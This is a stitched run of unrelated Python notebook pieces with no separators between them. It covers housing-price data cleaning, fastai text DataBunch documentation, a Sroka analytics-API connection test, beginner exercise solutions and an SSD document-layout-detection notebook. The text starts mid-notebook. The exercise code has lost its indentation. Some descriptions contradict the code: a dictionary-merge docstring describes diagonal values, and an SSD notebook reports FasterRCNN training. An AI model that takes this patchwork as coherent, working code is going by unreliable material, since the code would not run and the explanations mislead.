df['month'].value_counts().plot(ax=ax, kind='bar')
plt.show()
```
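The `dt` accessor pattern used above works on any datetime Series; a small standalone check:
```
import pandas as pd

dates = pd.to_datetime(pd.Series(['2019-02-21', '2018-11-03']))
years = dates.dt.year.tolist()    # [2019, 2018]
months = dates.dt.month.tolist()  # [2, 11]
```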
## Broker
```
df['broker'].describe()
counts = df['broker'].value_counts()
counts
fig, ax = plt.subplots()
df['broker'].value_counts().plot(ax=ax, kind='bar')
plt.show()
```
# Price
```
df['price'].describe()
```
Move the price to kkr (thousands of crowns) to make it easier to read.
```
df['price'] = df['price'] / 1000  # vectorized; no row-wise apply needed
import seaborn as sns
#histogram
sns.distplot(df['price']);
plt.show()
plt.boxplot(df['price'], 0, 'rD')
plt.show()
df = df[df.price < 20000]
df.columns
df.to_csv('houses_clean.csv')
```
## NLP datasets
```
from fastai.gen_doc.nbdoc import *
from fastai.text import *
```
This module contains the [`TextDataset`](/text.data.html#TextDataset) class, which is the main dataset you should use for your NLP tasks. It automatically does the preprocessing steps described in [`text.transform`](/text.transform.html#text.transform). It also contains all the functions to quickly get a [`TextDataBunch`](/text.data.html#TextDataBunch) ready.
## Quickly assemble your data
You should get your data in one of the following formats to make the most of the fastai library and use one of the factory methods of one of the [`TextDataBunch`](/text.data.html#TextDataBunch) classes:
- raw text files in folders train, valid, test in an ImageNet style,
- a csv where some column(s) gives the label(s) and the following one the associated text,
- a dataframe structured the same way,
- tokens and labels arrays,
- ids, vocabulary (correspondence id to word) and labels.
If you are assembling the data for a language model, you should define your labels as always 0 to respect those formats. The first time you create a [`DataBunch`](/basic_data.html#DataBunch) with one of those functions, your data will be preprocessed automatically. You can save it, so that the next time you call it is almost instantaneous.
Below are the classes that help assembling the raw data in a [`DataBunch`](/basic_data.html#DataBunch) suitable for NLP.
```
show_doc(TextLMDataBunch, title_level=3)
```
All the texts in the [`datasets`](/datasets.html#datasets) are concatenated and the labels are ignored. Instead, the target is the next word in the sentence.
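In other words, inputs and targets are the same token stream shifted by one position; a framework-independent sketch with made-up token ids:
```
token_ids = [5, 9, 2, 7]                         # illustrative token ids
inputs, targets = token_ids[:-1], token_ids[1:]  # predict the next token
# inputs = [5, 9, 2], targets = [9, 2, 7]
```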
```
show_doc(TextLMDataBunch.create)
show_doc(TextClasDataBunch, title_level=3)
show_doc(TextClasDataBunch.create)
```
All the texts are grouped by length (with a bit of randomness for the training set) then padded so that the samples have the same length to get in a batch.
```
show_doc(TextDataBunch, title_level=3)
jekyll_warn("This class can only work directly if all the texts have the same length.")
```
### Factory methods (TextDataBunch)
All those classes have the following factory methods.
```
show_doc(TextDataBunch.from_folder)
```
The folders scanned in `path` are <code>train</code>, `valid` and optionally `test`. Text files in the <code>train</code> and `valid` folders should be placed in subdirectories according to their classes (not applicable for a language model). `tokenizer` will be used to parse those texts into tokens.
You can pass a specific `vocab` for the numericalization step (if you are building a classifier from a language model you fine-tuned, for instance). kwargs will be split between the [`TextDataset`](/text.data.html#TextDataset) function and the class initialization; there you can specify parameters such as `max_vocab`, `chunksize`, `min_freq`, `n_labels` (see the [`TextDataset`](/text.data.html#TextDataset) documentation) or `bs`, `bptt` and `pad_idx` (see the LM data and classifier data sections).
```
show_doc(TextDataBunch.from_csv)
```
This method will look for `csv_name`, and optionally a `test` csv file, in `path`. These will be opened with [`header`](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_csv.html#pandas-read-csv), using `delimiter`. You can specify which are the `text_cols` and `label_cols`; by default a single label column is assumed to come before a single text column. If your csv has no header, you must specify these as indices. If you're training a language model and don't have labels, you must specify the `text_cols`. If there are several `text_cols`, the texts will be concatenated together with an optional field token. If there are several `label_cols`, the labels will be assumed to be one-hot encoded and `classes` will default to `label_cols` (you can ignore that argument for a language model). `label_delim` can be used to specify the separator between multiple labels in a column.
You can pass a `tokenizer` to be used to parse the texts into tokens and/or a specific `vocab` for the numericalization step (if you are building a classifier from a language model you fine-tuned, for instance). Otherwise you can specify parameters such as `max_vocab`, `min_freq`, `chunksize` for the Tokenizer and Numericalizer (processors). Other parameters (e.g. `bs`, `val_bs`, `num_workers`, etc.) will be passed to [`LabelLists.databunch()`](/data_block.html#LabelLists.databunch) (see the LM data and classifier data sections for more info).
```
show_doc(TextDataBunch.from_df)
```
This method will use `train_df`, `valid_df` and optionally `test_df` to build the [`TextDataBunch`](/text.data.html#TextDataBunch) in `path`. You can specify `text_cols` and `label_cols`; by default a single label column comes before a single text column. If you're training a language model and don't have labels, you must specify the `text_cols`. If there are several `text_cols`, the texts will be concatenated together with an optional field token. If there are several `label_cols`, the labels will be assumed to be one-hot encoded and `classes` will default to `label_cols` (you can ignore that argument for a language model).
You can pass a `tokenizer` to be used to parse the texts into tokens and/or a specific `vocab` for the numericalization step (if you are building a classifier from a language model you fine-tuned, for instance). Otherwise you can specify parameters such as `max_vocab`, `min_freq`, `chunksize` for the default Tokenizer and Numericalizer (processors). Other parameters (e.g. `bs`, `val_bs`, `num_workers`, etc.) will be passed to [`LabelLists.databunch()`](/data_block.html#LabelLists.databunch) (see the LM data and classifier data sections for more info).
```
show_doc(TextDataBunch.from_tokens)
```
This function will create a [`DataBunch`](/basic_data.html#DataBunch) from `trn_tok`, `trn_lbls`, `val_tok`, `val_lbls` and maybe `tst_tok`.
You can pass a specific `vocab` for the numericalization step (if you are building a classifier from a language model you fine-tuned, for instance). kwargs will be split between the [`TextDataset`](/text.data.html#TextDataset) function and the class initialization; there you can specify parameters such as `max_vocab`, `chunksize`, `min_freq`, `n_labels`, `tok_suff` and `lbl_suff` (see the [`TextDataset`](/text.data.html#TextDataset) documentation) or `bs`, `bptt` and `pad_idx` (see the LM data and classifier data sections).
```
show_doc(TextDataBunch.from_ids)
```
Texts are already preprocessed into `train_ids`, `train_lbls`, `valid_ids`, `valid_lbls` and maybe `test_ids`. You can specify the corresponding `classes` if applicable. You must specify a `path` and the `vocab` so that the [`RNNLearner`](/text.learner.html#RNNLearner) class can later infer the corresponding sizes in the model it will create. kwargs will be passed to the class initialization.
### Load and save
To avoid losing time preprocessing the text data more than once, you should save and load your [`TextDataBunch`](/text.data.html#TextDataBunch) using [`DataBunch.save`](/basic_data.html#DataBunch.save) and [`load_data`](/basic_data.html#load_data).
```
show_doc(TextDataBunch.load)
jekyll_warn("This method should only be used to load back `TextDataBunch` saved in v1.0.43 or before, it is now deprecated.")
```
### Example
Untar the IMDB sample dataset if not already done:
```
path = untar_data(URLs.IMDB_SAMPLE)
path
```
Since it comes in the form of csv files, we will use the corresponding `text_data` method. Here is an overview of what your file should look like:
```
pd.read_csv(path/'texts.csv').head()
```
And here is a simple way of creating your [`DataBunch`](/basic_data.html#DataBunch) for language modelling or classification.
```
data_lm = TextLMDataBunch.from_csv(Path(path), 'texts.csv')
data_clas = TextClasDataBunch.from_csv(Path(path), 'texts.csv')
```
## The TextList input classes
Behind the scenes, the previous functions will create a training, validation and maybe test [`TextList`](/text.data.html#TextList) that will be tokenized and numericalized (if needed) using [`PreProcessor`](/data_block.html#PreProcessor).
```
show_doc(Text, title_level=3)
show_doc(TextList, title_level=3)
```
`vocab` contains the correspondence between ids and tokens, `pad_idx` is the id used for padding. You can pass a custom `processor` in the `kwargs` to change the defaults for tokenization or numericalization. It should have the following form:
```
tokenizer = Tokenizer(SpacyTokenizer, 'en')
processor = [TokenizeProcessor(tokenizer=tokenizer), NumericalizeProcessor(max_vocab=30000)]
```
See below for all the arguments those tokenizers can take.
```
show_doc(TextList.label_for_lm)
show_doc(TextList.from_folder)
show_doc(TextList.show_xys)
show_doc(TextList.show_xyzs)
show_doc(OpenFileProcessor, title_level=3)
show_doc(open_text)
show_doc(TokenizeProcessor, title_level=3)
```
`tokenizer` is used on bits of `chunksize`. If `mark_fields=True`, add field tokens between each parts of the texts (given when the texts are read in several columns of a dataframe). See more about tokenizers in the [transform documentation](/text.transform.html).
```
show_doc(NumericalizeProcessor, title_level=3)
```
Uses `vocab` for this (if not None), otherwise create one with `max_vocab` and `min_freq` from tokens.
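As a rough sketch (not fastai's actual implementation), building a vocab from tokenized texts with `max_vocab` and `min_freq` caps could look like this:

```python
from collections import Counter

# Hypothetical sketch: keep at most max_vocab tokens occurring at least
# min_freq times, most frequent first (not the real NumericalizeProcessor).
def make_vocab(token_lists, max_vocab, min_freq):
    counts = Counter(tok for toks in token_lists for tok in toks)
    return [t for t, c in counts.most_common(max_vocab) if c >= min_freq]

vocab = make_vocab([['a', 'b', 'a'], ['a', 'c', 'b']], max_vocab=10, min_freq=2)
# 'c' appears only once, so it is dropped
```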
## Language Model data
A language model is trained to guess the next word in a flow of words. We don't feed it the different texts separately but concatenate them all together in one big array. To create the batches, we split this array into `bs` chunks of contiguous texts. Note that in all NLP tasks, we don't use the usual convention of sequence length being the first dimension: batch size is the first dimension and sequence length is the second. Here you can read the chunks of text along the rows.
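To make the batch-first layout concrete, here is a minimal sketch (assuming a flat list of token ids, not the real fastai loader) of how a token stream becomes `(bs, bptt)` batches with shifted targets:

```python
import numpy as np

# Hypothetical sketch of LM batching: one long token stream is split into
# `bs` contiguous chunks; each batch is a (batch, sequence) slice of width bptt.
def lm_batches(ids, bs, bptt):
    n = len(ids) // bs                               # tokens per chunk (drop remainder)
    stream = np.array(ids[:n * bs]).reshape(bs, n)   # batch-first layout
    for i in range(0, n - 1, bptt):
        seq_len = min(bptt, n - 1 - i)
        x = stream[:, i:i + seq_len]
        y = stream[:, i + 1:i + 1 + seq_len]         # targets = inputs shifted by one
        yield x, y

x, y = next(lm_batches(list(range(20)), bs=2, bptt=4))
# x's first row starts at token 0, its second row at token 10
```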
```
path = untar_data(URLs.IMDB_SAMPLE)
data = TextLMDataBunch.from_csv(path, 'texts.csv')
x,y = next(iter(data.train_dl))
example = x[:15,:15].cpu()
texts = pd.DataFrame([data.train_ds.vocab.textify(l).split(' ') for l in example])
texts
jekyll_warn("If you are used to another convention, beware! fastai always uses batch as a first dimension, even in NLP.")
```
This is all done internally when we use [`TextLMDataBunch`](/text.data.html#TextLMDataBunch), by wrapping the dataset in the following pre-loader before calling a [`DataLoader`](https://pytorch.org/docs/stable/data.html#torch.utils.data.DataLoader).
```
show_doc(LanguageModelPreLoader)
```
[`LanguageModelPreLoader`](/text.data.html#LanguageModelPreLoader) is an internal class used for training a language model. It takes the sentences, passed as a jagged array of numericalised sentences in `dataset`, and returns contiguous batches to the pytorch dataloader with batch size `bs` and sequence length `bptt`.
- `lengths` can be provided for the jagged training data; otherwise the lengths are calculated internally
- `backwards=True` will reverse the sentences.
- `shuffle=True` will shuffle the order of the sentences at the start of each epoch, except the first
The following description is useful for understanding the implementation of [`LanguageModelPreLoader`](/text.data.html#LanguageModelPreLoader):
- idx: an instance of CircularIndex that indexes items while taking the following into account: 1) shuffling, 2) the direction of indexing, 3) wrapping around to the head (reading forward) or tail (reading backwards) of the ragged array as needed to fill the last batch(es)
- ro: index of the first rag of each row in the batch to be extracted. Returned as the index of the next rag to be extracted
- ri: reading forward, the index of the first token to be extracted in the current rag (ro); reading backwards, one position after the last token to be extracted in the rag
- overlap: overlap between batches is 1, because we only predict the next token
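The ro/ri bookkeeping above can be illustrated with a small sketch (a simplified stand-in, not the actual `fill_row` implementation) that reads a contiguous window out of a jagged array:

```python
# Hypothetical sketch: fill one row of seq_len tokens from a ragged array,
# starting at rag `ro`, offset `ri`, and return the updated cursor.
def fill_row(sentences, ro, ri, seq_len):
    out = []
    while len(out) < seq_len and ro < len(sentences):
        take = sentences[ro][ri:ri + seq_len - len(out)]
        out.extend(take)
        ri += len(take)
        if ri >= len(sentences[ro]):   # current rag exhausted: move to the next
            ro, ri = ro + 1, 0
    return out, ro, ri

row, ro, ri = fill_row([[1, 2, 3], [4, 5], [6, 7, 8]], ro=0, ri=1, seq_len=4)
# row spans the end of the first rag and the whole second rag
```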
## Classifier data
When preparing the data for a classifier, we keep the different texts separate, which poses another challenge for the creation of batches: since they don't all have the same length, we can't easily collate them together in batches. To help with this we use two different techniques:
- padding: each text is padded with the `PAD` token so that all the texts in a batch have the same length
- sorting the texts (ish): to avoid putting a very long text together with a very short one (which would then need a lot of `PAD` tokens), we group the texts by length. For the training set, we still add some randomness to avoid showing the same batches at every step of the training.
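The two techniques above can be sketched in a few lines (a simplified illustration, not fastai's actual collate function):

```python
# Hypothetical sketch: order texts by length, then left-pad with pad_idx
# so every sequence in the batch has the same width.
def pad_batch(seqs, pad_idx=1):
    width = max(len(s) for s in seqs)
    return [[pad_idx] * (width - len(s)) + s for s in seqs]  # pad before the text

texts = [[5, 6, 7], [8, 9], [2, 3, 4, 5, 6]]
order = sorted(range(len(texts)), key=lambda i: len(texts[i]), reverse=True)
batch = pad_batch([texts[i] for i in order])
```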
Here is an example of batch with padding (the padding index is 1, and the padding is applied before the sentences start).
```
path = untar_data(URLs.IMDB_SAMPLE)
data = TextClasDataBunch.from_csv(path, 'texts.csv')
iter_dl = iter(data.train_dl)
_ = next(iter_dl)
x,y = next(iter_dl)
x[-10:,:20]
```
This is all done internally when we use [`TextClasDataBunch`](/text.data.html#TextClasDataBunch), by using the following classes:
```
show_doc(SortSampler)
```
This pytorch [`Sampler`](https://pytorch.org/docs/stable/data.html#torch.utils.data.Sampler) is used for the validation and (if applicable) the test set.
```
show_doc(SortishSampler)
```
This pytorch [`Sampler`](https://pytorch.org/docs/stable/data.html#torch.utils.data.Sampler) is generally used for the training set.
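The "sortish" idea can be sketched as follows (an illustrative approximation, not the real `SortishSampler`): shuffle the indices, cut them into chunks, and sort each chunk by length, so batches group similar lengths while keeping some randomness between epochs.

```python
import random

# Hypothetical sketch of a sortish ordering over sequence lengths.
def sortish_order(lengths, chunk=4, seed=0):
    idx = list(range(len(lengths)))
    random.Random(seed).shuffle(idx)                     # randomness between epochs
    chunks = [idx[i:i + chunk] for i in range(0, len(idx), chunk)]
    return [i for c in chunks
            for i in sorted(c, key=lambda j: lengths[j], reverse=True)]

order = sortish_order([3, 10, 1, 7, 5, 2], chunk=3)
```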
```
show_doc(pad_collate)
```
This will collate the `samples` in batches while adding padding with `pad_idx`. If `pad_first=True`, padding is applied at the beginning (before the sentence starts) otherwise it's applied at the end.
## Undocumented Methods - Methods moved below this line will intentionally be hidden
```
show_doc(TextList.new)
show_doc(TextList.get)
show_doc(TokenizeProcessor.process_one)
show_doc(TokenizeProcessor.process)
show_doc(OpenFileProcessor.process_one)
show_doc(NumericalizeProcessor.process)
show_doc(NumericalizeProcessor.process_one)
show_doc(TextList.reconstruct)
show_doc(LanguageModelPreLoader.on_epoch_begin)
show_doc(LanguageModelPreLoader.on_epoch_end)
```
## New Methods - Please document or move to the undocumented section
```
show_doc(LMLabelList)
show_doc(LanguageModelPreLoader.allocate_buffers)
show_doc(LanguageModelPreLoader.CircularIndex.shuffle)
show_doc(LanguageModelPreLoader.fill_row)
```
## Test your Sroka set up
The purpose of this notebook is to check whether you are able to connect with given API's that Sroka provides and that your credentials are correctly saved in config.ini file.
Where possible, we have provided a generic query; however, some APIs require you to pass IDs in order to get any results. In that case, please define the variables' values first.
```
# GA API
from sroka.api.ga.ga import ga_request
# GAM API
from sroka.api.google_ad_manager.gam_api import get_data_from_admanager
# Qubole API (first of the options)
from sroka.api.qubole.query_result_file import get
# Qubole API (second of the options)
from sroka.api.qubole.qubole_api import done_qubole, request_qubole
# MOAT API
from sroka.api.moat.moat_api import get_data_from_moat
# Rubicon API
from sroka.api.rubicon.rubicon_api import get_data_from_rubicon
# Athena API
from sroka.api.athena.athena_api import query_athena, done_athena
# Google sheets API
from sroka.api.google_drive.google_drive_api import google_drive_sheets_read, \
google_drive_sheets_create, google_drive_sheets_write, google_drive_sheets_upload
# S3 API
from sroka.api.s3_connection.s3_connection_api import s3_download_data
```
## Athena
```
df = query_athena("""
SELECT '2019-03-01' as date
""")
df
```
## S3
```
# input a path to data on your s3, it is needed to perform any query
s3_folder = ''
s3_download_data('s3://{}'.format(s3_folder), prefix=True, sep=';')
```
## Google Ad Manager
```
start_day = '01'
end_day='04'
start_month = '03'
end_month = '03'
year = '2019'
query = ""
dimensions = ['DATE']
columns = ['TOTAL_ACTIVE_VIEW_MEASURABLE_IMPRESSIONS',
'TOTAL_ACTIVE_VIEW_VIEWABLE_IMPRESSIONS']
start_date = {'year': year,
'month': start_month,
'day': start_day}
stop_date = {'year': year,
'month': end_month,
'day': end_day}
df_gam = get_data_from_admanager(query, dimensions, columns, start_date, stop_date)
df_gam.head()
```
## Google Analytics
```
# your account id, it is needed to perform any query
your_id = ''
request = {
"ids" : "ga:{}".format(your_id),
"start_date" : "2019-03-01",
"end_date" : "2019-03-04",
"metrics" : "ga:pageviews",
"filters" : "ga:country==Poland",
"segment" : "",
"dimensions" : "ga:day"
}
df_ga = ga_request(request, print_sample_size=True, sampling_level='FASTER')
df_ga.head()
```
## Google Sheets
```
new_sheet = google_drive_sheets_create('new_sheet')
google_drive_sheets_write(df, new_sheet)
```
## Moat
```
input_data_moat = {
'start' : '20190301',
'end' : '20190304',
'columns' : ['date','impressions_analyzed']
}
df_moat = get_data_from_moat(input_data_moat, 'moat')
df_moat.head()
```
## Qubole
```
presto_query = """
SELECT '2019-03-01' as date;
"""
data_presto = request_qubole(presto_query, query_type='hive')
data_presto.head()
```
## Rubicon
```
input_data = {
'start' : '2018-08-23T00:00:00-07:00',
'end' : '2018-08-23T23:59:59-07:00',
'dimensions' : ['date', 'advertiser'],
'metrics' : ['paid_impression',
'starts',
'completes'
],
'filters' : ['dimension:country_id==PL'
]
}
data = get_data_from_rubicon(input_data)
data.head()
```
This file should be completed before the *beginning* of class on Saturday Feb 17th.
Open book, open notes, open internet!
```
## Write each function below according to the docstring.
def max_lists(list1, list2):
"""
list1 and list2 have the same length.
Return a list which contains, for each index,
the maximum element of both list at this index.
Parameters
----------
list1 : {list} of numeric values
list2 : {list} of numeric values
Returns
-------
{list} : list of maximum values for each index of list1,list2
Example
-------
>>> max_lists([1, 4, 8], [3, 1, 9])
[3, 4, 9]
>>> max_lists([5, 7, 2, 3, 6], [3, 9, 1, 2, 8])
[5, 9, 2, 3, 8]
"""
# long version
ret = []
for pair in list(zip(list1, list2)):
ret.append(max(pair))
return ret
def max_list_v1(list1, list2):
return [max(pair) for pair in list(zip(list1, list2))]
def max_list_v2(list1, list2):
for list1_pair in enumerate(list1):
yield max(list2[list1_pair[0]], list1_pair[1])
v = max_lists([1, 4, 8], [3, 1, 9])
print(v)
v1 = max_list_v1([1, 4, 8], [3, 1, 9])
print(v1)
v2 = max_list_v2([1, 4, 8], [3, 1, 9])
print(list(v2))
def get_diagonal(mat):
"""
Given a matrix encoded as a 2 dimensional python list, return a list
containing all the values in the diagonal starting at the index 0, 0.
Parameters
----------
mat : 2 dimensional list ({list} of {list} of numeric values)
Returns
-------
{list} : values in the diagonal
Example
-------
E.g.
mat = [[1, 2], [3, 4], [5, 6]]
| 1 2 |
| 3 4 |
| 5 6 |
get_diagonal(mat) => [1, 4]
You may assume that the matrix is nonempty.
>>> get_diagonal([[1, 2], [3, 4], [5, 6]])
[1, 4]
"""
    max_i = min(len(mat), len(mat[0]))  # diagonal length is the smaller dimension
ret = list()
for x in range(max_i):
ret.append(mat[x][x])
return ret
gd = get_diagonal([[1, 2], [3, 4], [5, 6]])
print(gd)
def merge_dictionaries(d1, d2):
"""
Return a new dictionary which contains all the keys from d1 and d2 with
their associated values. If a key is in both dictionaries, the value should
be the sum of the two values.
Parameters
----------
d1 : {dict}
d2 : {dict}
Returns
-------
{dict} : values in the diagonal
Example
-------
>>> d1 = {"a": 1, "b": 5, "c": 1, "e": 8}
>>> d2 = {"b": 2, "c": 5, "d": 10, "f": 6}
>>> merge_dictionaries(d1,d2) == {"a": 1, "b": 7, "c": 6, "d": 10, "e": 8, "f": 6}
True
"""
keys = set(list(d1.keys()) + list(d2.keys()))
ret = {}
for key in keys:
ret[key] = d1.get(key,0) + d2.get(key,0)
return ret
d1 = {"a": 1, "b": 5, "c": 1, "e": 8}
d2 = {"b": 2, "c": 5, "d": 10, "f": 6}
merge_dictionaries(d1,d2) == {"a": 1, "b": 7, "c": 6, "d": 10, "e": 8, "f": 6}
print(d1)
def make_char_dict(filename):
"""
Given a file containing rows of text, create a dictionary with keys
of single characters. The value is a list of all the line numbers which
start with that letter. The first line should have line number 1.
Characters which never are the first letter of a line do not need to be
included in your dictionary.
Parameters
----------
filename : {string} indicating path to file
Returns
-------
{dict} : keys are {str} and values are {list}
Example
-------
>>> result = make_char_dict('data/people.txt')
>>> result['j']
[2, 19, 20]
>>> result['g']
[3]
"""
ret = {}
with open(filename) as f:
        for lineno, line in enumerate(f, start=1):  # first line is line 1, per the docstring
            c = line[0]
            if c.isalpha():
                ret.setdefault(c, []).append(lineno)
return ret
result = make_char_dict('data/people.txt')
print(result)
```
<a href="https://colab.research.google.com/github/Tessellate-Imaging/Monk_Object_Detection/blob/master/application_model_zoo/Example%20-%20Document%20Layout%20Analysis%20(SSD512).ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Document Layout Analysis Using SSD
## About the network:
1. Paper on SSD: https://arxiv.org/abs/1512.02325
2. Blog-1 on SSD: https://towardsdatascience.com/review-ssd-single-shot-detector-object-detection-851a94607d11
3. Blog-2 on SSD: https://medium.com/@jonathan_hui/ssd-object-detection-single-shot-multibox-detector-for-real-time-processing-9bd8deac0e06
# Table of Contents
### 1. Installation Instructions
### 2. Use trained Model for Document Layout Analysis
### 3. How to train using PRImA Layout Analysis Dataset
## The gluoncv-finetune pipeline of Monk Object Detection Library has been used for implementing this model.
- After some comparisons, it was found that VGG16 performs better than ResNet101 for the object detection task using FasterRCNN, so VGG16 was chosen for the backend. First, the dataset was converted from Monk format to COCO format.
- The model was trained for 3 epochs with a learning rate of 0.005 and then for 3 more epochs with a learning rate of 0.001. The images were preprocessed to a smaller size (min 300px, max 500px) and normalised using the mean and standard deviation calculated in the preprocessing notebook.
- The batch size has been kept at 2 because anything larger was causing a CUDAOutOfMemory error. The model achieved RPN accuracy = 0.807714 and RCNN accuracy = 0.750662.
# Installation
- Run these commands
- git clone https://github.com/Tessellate-Imaging/Monk_Object_Detection.git
- cd Monk_Object_Detection/1_gluoncv_finetune/installation
- Select the right requirements file and run
- cat requirements_cuda10.1.txt | xargs -n 1 -L 1 pip install
```
! git clone https://github.com/Tessellate-Imaging/Monk_Object_Detection.git
# For colab use the command below
#! cd Monk_Object_Detection/1_gluoncv_finetune/installation && cat requirements_colab.txt | xargs -n 1 -L 1 pip install
# For Local systems and cloud select the right CUDA version
!cd Monk_Object_Detection/1_gluoncv_finetune/installation && cat requirements_cuda10.1.txt | xargs -n 1 -L 1 pip install
```
# Use Already Trained Model for Demo
```
import os
import sys
sys.path.append("Monk_Object_Detection/1_gluoncv_finetune/lib/");
from inference_prototype import Infer
#Download trained model
! wget --load-cookies /tmp/cookies.txt "https://docs.google.com/uc?export=download&confirm=$(wget --save-cookies /tmp/cookies.txt --keep-session-cookies --no-check-certificate 'https://docs.google.com/uc?export=download&id=1E6T7RKGwy-v1MUxVJm-rxt5XcRyr2SQ7' -O- | sed -rn 's/.*confirm=([0-9A-Za-z_]+).*/\1\n/p')&id=1E6T7RKGwy-v1MUxVJm-rxt5XcRyr2SQ7" -O obj_dla_ssd512_trained.zip && rm -rf /tmp/cookies.txt
! unzip -qq obj_dla_ssd512_trained.zip
model_name = "ssd_512_vgg16_atrous_coco";
params_file = "dla_ssd512/dla_ssd512-vgg16.params";
class_list = ["paragraph", "heading", "credit", "footer", "drop-capital", "floating", "noise", "maths", "header", "caption", "image", "linedrawing", "graphics", "fname", "page-number", "chart", "separator", "table"];
gtf = Infer(model_name, params_file, class_list, use_gpu=True);
# download test images
! wget --load-cookies /tmp/cookies.txt "https://docs.google.com/uc?export=download&confirm=$(wget --save-cookies /tmp/cookies.txt --keep-session-cookies --no-check-certificate 'https://docs.google.com/uc?export=download&id=1VEkfJuicIr-STIqYOI-UruDDttWGXNxw' -O- | sed -rn 's/.*confirm=([0-9A-Za-z_]+).*/\1\n/p')&id=1VEkfJuicIr-STIqYOI-UruDDttWGXNxw" -O Test_Images.zip && rm -rf /tmp/cookies.txt
! unzip -qq Test_Images.zip
img_name = "Test_Images/test1.jpg";
visualize = True;
thresh = 0.3;
output = gtf.run(img_name, visualize=visualize, thresh=thresh);
img_name = "Test_Images/test2.jpg";
visualize = True;
thresh = 0.3;
output = gtf.run(img_name, visualize=visualize, thresh=thresh);
img_name = "Test_Images/test3.jpg";
visualize = True;
thresh = 0.4;
output = gtf.run(img_name, visualize=visualize, thresh=thresh);
```
# Train Your Own Model
## Dataset Credits
- https://www.primaresearch.org/datasets/Layout_Analysis
```
#Download Dataset
! wget --load-cookies /tmp/cookies.txt "https://docs.google.com/uc?export=download&confirm=$(wget --quiet --save-cookies /tmp/cookies.txt --keep-session-cookies --no-check-certificate 'https://docs.google.com/uc?export=download&id=1iBfafT1WHAtKAW0a1ifLzvW5f0ytm2i_' -O- | sed -rn 's/.*confirm=([0-9A-Za-z_]+).*/\1\n/p')&id=1iBfafT1WHAtKAW0a1ifLzvW5f0ytm2i_" -O PRImA_Layout_Analysis_Dataset.zip && rm -rf /tmp/cookies.txt
! unzip -qq PRImA_Layout_Analysis_Dataset.zip
```
# Data Preprocessing
### Library for Data Augmentation
Refer to https://github.com/albumentations-team/albumentations for more details
### Data Preprocessing
- Normalisation: calculated the mean & standard deviation of the training images (3 images were taken out of the dataset for inference) to feed into the model for normalisation (used in FasterRCNN).
- Format conversion: the TIFF format was causing problems in data augmentation, and training on TIFF images was more than 5x slower than on JPEG images because of their huge size. Therefore, the TIFF images were converted to JPEG format.
- Selective data augmentation: the raw dataset had 4750+ paragraph-type objects but only 10-30 objects of types such as frames and graphics, which led to a huge bias in the dataset. To generate more data and decrease this bias, a customised function has been implemented from scratch. This function produces randomly translated augmented copies of only those images which contain minority classes. Using it, the dataset size increased from 475 images to 1783 images. If data augmentation had been done on every image, there would have been 24000+ paragraphs in the dataset, whereas there are 19568 now, which slightly improves the bias (exact numbers are in the data preprocessing notebook). The augmented images had to be saved in the dataset because the augmentation function couldn't be called on the fly.
- Conversion from VOC to Monk format: so that the Monk format can later be used for the SSD model; the data was also converted to YOLO format for the YOLO model and to COCO format for the FasterRCNN model.
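The selective augmentation rule above can be sketched in a few lines (names like `needs_augmentation` and the threshold are illustrative assumptions, not the notebook's actual function):

```python
from collections import Counter

# Hypothetical sketch: only images containing at least one under-represented
# label are marked for extra augmented copies.
def needs_augmentation(labels, counts, threshold=100):
    return any(counts[l] < threshold for l in labels)

counts = Counter({'paragraph': 4750, 'table': 25, 'chart': 12})
images = {'doc1': ['paragraph'], 'doc2': ['paragraph', 'table']}
to_augment = [name for name, labels in images.items()
              if needs_augmentation(labels, counts)]
# only doc2 qualifies, because 'table' is a minority class
```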
```
! pip install albumentations
import os
import sys
import cv2
import numpy as np
import pandas as pd
from PIL import Image
import albumentations as A
import glob
import matplotlib.pyplot as plt
import xmltodict
import json
from tqdm.notebook import tqdm
from pycocotools.coco import COCO
root_dir = "PRImA Layout Analysis Dataset/";
img_dir = "Images/";
anno_dir = "XML/";
final_root_dir="Document_Layout_Analysis/" #Directory for jpeg and augmented images
if not os.path.exists(final_root_dir):
os.makedirs(final_root_dir)
if not os.path.exists(final_root_dir+img_dir):
os.makedirs(final_root_dir+img_dir)
```
## TIFF Image Format to JPEG Image Format
```
for name in glob.glob(root_dir + img_dir + '*.tif'):
    im = Image.open(name)
    # os.path avoids the rstrip/lstrip pitfall: those strip character *sets*,
    # not prefixes/suffixes, and can eat legitimate characters from the name
    base = os.path.splitext(os.path.basename(name))[0]
    im.save(final_root_dir + img_dir + base + '.jpg', 'JPEG')
```
# Format Conversion and Data Augmentation
As most part of a document is text, there were far more paragraphs in the dataset than there were other labels such as tables or graphs. To handle this huge bias in the dataset, we augmented only those document images which had one of these minority labels in them. For example, if the document only had paragraphs and images, then we didn’t augment it. But if it had tables, charts, graphs or any other minority label, we augmented that image by many folds. This process helped in reducing the bias in the dataset by around 25%. This selection and augmentation has been done during the format conversion from VOC to Monk Format.
## Given format- VOC Format
### Dataset Directory Structure
./PRImA Layout Analysis Dataset/ (root_dir)
|
|-----------Images (img_dir)
| |
| |------------------img1.jpg
| |------------------img2.jpg
| |------------------.........(and so on)
|
|
|-----------Annotations (anno_dir)
| |
| |------------------img1.xml
| |------------------img2.xml
| |------------------.........(and so on)
## Required Format- Monk Format
### Dataset Directory Structure
./Document_Layout_Analysis/ (final_root_dir)
|
|-----------Images (img_dir)
| |
| |------------------img1.jpg
| |------------------img2.jpg
| |------------------.........(and so on)
|
|
|-----------train_labels.csv (anno_file)
### Annotation file format
| Id | Labels |
| img1.jpg | x1 y1 x2 y2 label1 x1 y1 x2 y2 label2 |
- Labels: xmin ymin xmax ymax label
- xmin, ymin - top left corner of bounding box
- xmax, ymax - bottom right corner of bounding box
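The Labels column above can be produced with a small helper (a hypothetical illustration of the serialisation, not part of the notebook's code):

```python
# Hypothetical helper: serialise a list of boxes into the Monk
# "xmin ymin xmax ymax label ..." string used in train_labels.csv.
def boxes_to_label(boxes):
    return ' '.join('{} {} {} {} {}'.format(x1, y1, x2, y2, lbl)
                    for (x1, y1, x2, y2, lbl) in boxes)

row = boxes_to_label([(10, 20, 110, 220, 'paragraph'), (5, 5, 50, 50, 'image')])
```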
```
files = os.listdir(root_dir + anno_dir);
combined = [];
```
### Data Augmentation Function
```
def augmentData(fname, boxes):
image = cv2.imread(final_root_dir+img_dir+fname)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
transform = A.Compose([
A.IAAPerspective(p=0.7),
A.ShiftScaleRotate(shift_limit=0.1, scale_limit=0.1, rotate_limit=5, p=0.5),
